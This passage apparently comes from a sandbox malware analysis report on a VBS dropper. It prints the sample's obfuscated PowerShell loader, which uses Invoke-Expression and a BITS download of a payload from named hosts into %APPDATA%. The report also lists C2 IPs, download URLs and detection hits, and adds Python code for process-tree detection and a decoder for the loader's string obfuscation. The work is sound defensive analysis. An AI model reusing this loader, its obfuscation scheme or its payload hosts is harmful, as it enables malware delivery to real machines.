'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf R
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3712, ProcessName: svchost.exe
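The Sigma matches above are listed by title and by the process event that fired them. As an added example, not the Sigma rules themselves and not the sandbox's own logic, the Python below writes down the three conditions those titles describe (a script host spawning a shell, wab.exe with a parent it would not normally have or a child it should never have, and an abnormally long command line) and runs them over constructed process-creation events modelled on this report's process tree. The command-line length threshold and the set of expected parents for wab.exe are assumptions; the wscript.exe parent image is left empty because the report shows it empty, and the long PowerShell command line is a stand-in of the same length class rather than the real one.

```python
# Added example: simplified process-tree checks in the spirit of the Sigma titles above,
# evaluated over constructed Sysmon/4688-style events. Not the Sigma rules themselves.

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: wab.exe (Windows Contacts) is normally launched interactively.
WAB_EXPECTED_PARENTS = {"explorer.exe"}
# Assumption: the report only says "very long"; 1000 characters is a conservative cut-off.
LONG_CMDLINE = 1000


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events: list[dict]) -> list[tuple[int, str]]:
    """Return (ProcessId, rule-name) pairs for every event that trips a check."""
    hits = []
    for ev in events:
        img, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
        if parent in SCRIPT_HOSTS and img in SHELLS:
            hits.append((ev["ProcessId"], "script-host-spawns-shell"))
        if img == "wab.exe" and parent not in WAB_EXPECTED_PARENTS:
            hits.append((ev["ProcessId"], "wab-unusual-parent"))
        if parent == "wab.exe":
            hits.append((ev["ProcessId"], "wab-unusual-child"))
        if len(ev["CommandLine"]) > LONG_CMDLINE:
            hits.append((ev["ProcessId"], "very-long-cmdline"))
    return hits


# Constructed events; PIDs and images follow the report's tree, the long PowerShell
# command line is a placeholder of the same length class, not the real one.
EVENTS = [
    {"ProcessId": 5444, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": "",
     "CommandLine": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\F8HYX5HOgA.vbs"'},
    {"ProcessId": 5708, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": '"powershell.exe" "Function Krse ($Udrensnri){' + "X" * 4000 + '}"'},
    {"ProcessId": 6388, "Image": r"C:\Windows\system32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 2780, "Image": r"C:\Program Files (x86)\windows mail\wab.exe",
     "ParentImage": r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    {"ProcessId": 1048, "Image": r"C:\Windows\SysWOW64\dialer.exe",
     "ParentImage": r"C:\Program Files (x86)\windows mail\wab.exe",
     "CommandLine": r'"C:\Windows\system32\dialer.exe"'},
]

if __name__ == "__main__":
    for pid, rule in evaluate(EVENTS):
        print(pid, rule)
```

On these events the checks fire on exactly the four links of the chain that the report's Sigma section reports: PID 5708 (wscript.exe spawning powershell.exe, and its oversized command line), PID 2780 (wab.exe started by powershell.exe) and PID 1048 (dialer.exe started by wab.exe); wscript.exe itself and conhost.exe produce nothing, as they should.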
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-12-19T12:48:32.209044+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5:49771 | 103.120.177.150:443 | TCP


                    AV Detection

Source: F8HYX5HOgA.vbs | Avira: detected
Source: F8HYX5HOgA.vbs | Virustotal: Detection: 46%
Source: F8HYX5HOgA.vbs | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.5:49771 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2544913073.0000000007047000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdb source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2550855628.0000000007F27000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: wab.exe, 00000007.00000003.2572739867.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: wab.exe, 00000007.00000003.2573715561.0000000025670000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2573394658.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: wab.exe, 00000007.00000003.2574386821.00000000255F0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2536849712.000000000081E000.00000004.00000020.00020000.00000000.sdmp

                    Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: global traffic | TCP traffic: 192.168.2.5:49815 -> 91.92.252.226:7127
Source: Joe Sandbox View | IP Address: 107.161.23.150
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49771 -> 103.120.177.150:443
Source: global traffic | HTTP traffic detected:
  GET /ms/ms.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: www.royalengineeringllc.com
  Cache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.92.252.226
                    Source: unknown | TCP traffic detected without corresponding DNS query: 91.92.252.226 (22 identical entries)
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 identical entries)
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05949F64 memset,memset,WSARecv,GetLastError,WSAGetLastError,WSAGetLastError,WSAGetLastError,RegisterWaitForSingleObject
                    Source: global traffic | HTTP traffic detected: GET /ms/Spej.ttf HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Mon, 05 Feb 2024 11:01:15 GMT | User-Agent: Microsoft BITS/7.8 | Host: www.astenterprises.com.pk
                    Source: global traffic | HTTP traffic detected: GET /ms/ms.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.royalengineeringllc.com | Cache-Control: no-cache
                    Source: global traffic | DNS traffic detected: DNS query: www.astenterprises.com.pk
                    Source: global traffic | DNS traffic detected: DNS query: www.royalengineeringllc.com
                    Source: powershell.exe, 00000005.00000002.2550855628.0000000007F10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                    Source: svchost.exe, 00000004.00000002.3339991717.000002A7978A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: powershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000005.00000002.2544913073.00000000070F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co/
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBjq
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                    Source: svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315FF93000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: svchost.exe, 00000004.00000002.3341467361.000002A79CEED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341611453.000002A79CF0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/
                    Source: svchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ice
                    Source: svchost.exe, 00000004.00000002.3340446288.000002A798102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2203585000.000002A79CD25000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341139062.000002A79CE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341740612.000002A79D080000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.2177178561.000002A79CD21000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341763948.000002A79D290000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3340587401.000002A798640000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttf
                    Source: powershell.exe, 00000001.00000002.2709173693.000002315EFBA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttfP
                    Source: powershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk/ms/Spej.ttfXR
                    Source: svchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.astenterprises.com.pk:443/ms/Spej.ttf
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.royalengineeringllc.com/ms/ms.bin
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.royalengineeringllc.com/ms/ms.bin0t
                    Source: wab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.royalengineeringllc.com/ms/ms.binGu
                    Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknown | HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.5:49707 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 103.120.177.150:443 -> 192.168.2.5:49771 version: TLS 1.2
                    Source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DirectInput8Create (memstr_0d1158bd-8)
                    Source: wab.exe, 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: GetRawInputData (memstr_4a94ac3d-f)
                    Source: Yara match | File source: 7.3.wab.exe.256f0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.3.dialer.exe.5930000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.3.dialer.exe.5710000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.3.wab.exe.254d0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: wab.exe PID: 2780, type: MEMORYSTR

                    System Summary

                    Source: amsi32_4856.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-Br
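The command line above is the entire first PowerShell stage, and every string in it is hidden behind Krse, which keeps one character in eight (offsets 7, 15, 23, ...) and throws away the surrounding filler words. Below is an added decoder, not part of the Joe Sandbox report: a Python port of Krse run over the literals copied from this command line. The $bekraefte00 literal and the truncated while-loop body are left out on purpose: they decode to fragments that suggest the report rendering collapsed runs of spaces inside them, which shifts the 8-character stride (an inference from the decoder output, not something the report states), so they only decode reliably from the raw process-creation event. The `intact()` length check is this example's own heuristic for catching that case.

```python
from __future__ import annotations

import re

# Added example, not part of the Joe Sandbox report: a Python port of the
# sample's own Krse() string decoder, run over literals copied from the
# powershell.exe command line above.
#
# The PowerShell original:
#   Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1;
#     $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}
# It keeps the character at offsets 7, 15, 23, ... while the offset is below
# Length-1; the other seven characters of every group are dictionary filler.
FIRST, STRIDE = 7, 8


def krse(obfuscated: str) -> str:
    """Port of Krse(): the characters at FIRST, FIRST+STRIDE, ... below len-1."""
    return "".join(obfuscated[i] for i in range(FIRST, len(obfuscated) - 1, STRIDE))


def intact(obfuscated: str) -> bool:
    """Structural check before decoding (this example's own heuristic).

    Every literal in this command line that decodes cleanly is one 8-character
    group per plaintext character plus one trailing group, so its length is a
    multiple of STRIDE. A literal copied from a rendered page that fails this
    has probably lost whitespace (HTML collapses runs of spaces) and will
    decode to garbage; take it from the raw process-creation event instead.
    """
    return len(obfuscated) > 0 and len(obfuscated) % STRIDE == 0


# Excerpt of the command line exactly as printed in this report, minus the
# $bekraefte00 literal and the truncated while-loop body (see the note after
# this block).
CMDLINE_EXCERPT = (
    "$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';"
    "$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';"
    "function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}"
    "$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';"
    "Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;"
    "Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;"
    "$Crusadovae2=$Crusadovae2+'\\Notorhiza.Sal' ;"
    "Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;"
)

# A literal is either assigned ($name=Krse '...') or passed straight to
# Fundmong, which dot-sources it through $bekraefte01 (= iex), i.e. runs it.
_LITERAL = re.compile(r"(?:(\$\w+)=)?Krse\s+'([^']*)'")


def decode_command_line(cmdline: str) -> list[tuple[str, str]]:
    """(target, plaintext) for every Krse literal, in command-line order.

    target is the variable the plaintext lands in, or "Fundmong" when the
    plaintext is executed immediately. Literals that fail intact() are still
    decoded so the damage is visible, but their target is marked.
    """
    out: list[tuple[str, str]] = []
    for m in _LITERAL.finditer(cmdline):
        target = m.group(1) or "Fundmong"
        if not intact(m.group(2)):
            target += " [length not a multiple of 8: whitespace lost?]"
        out.append((target, krse(m.group(2))))
    return out


if __name__ == "__main__":
    for target, plaintext in decode_command_line(CMDLINE_EXCERPT):
        print(f"{target:<14} {plaintext}")
```

Run as-is, the decoder gives `$bekraefte01 = iex` (so every `Fundmong (Krse '...')` is a dot-sourced Invoke-Expression of the decoded text), `$bekraefte02 = Transferring` (one of the BITS JobState values, which fits a loop that waits on a BITS job), `$Jaspedam82 = https://www.astenterprises.com.pk/ms/Spej.ttf` (the same URL the BITS GET in the network section hits), and three executed statements: `$global:Crusadovae2=$env:appdata`, `Import-Module BitsTransfer` and `$global:Crusadovae7=(Test-Path $Crusadovae2)`; the command line then appends `\Notorhiza.Sal` to that %APPDATA% path before the Test-Path. When a literal decodes to stray letters instead of PowerShell, check `intact()` first and pull the command line from the sandbox's process tree export rather than the rendered page.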
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E95A76
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E89A6A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E8CA60
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E96822
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FF848E87058
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA0C62
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA1248
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA1CF0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_02DA1C44
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_073183E8
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05963524
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05953573
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05962CBD
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_0595BC11
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_0595C458
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05963F8C
                    Source: C:\Windows\SysWOW64\dialer.exe | Code function: 9_2_05967FA2
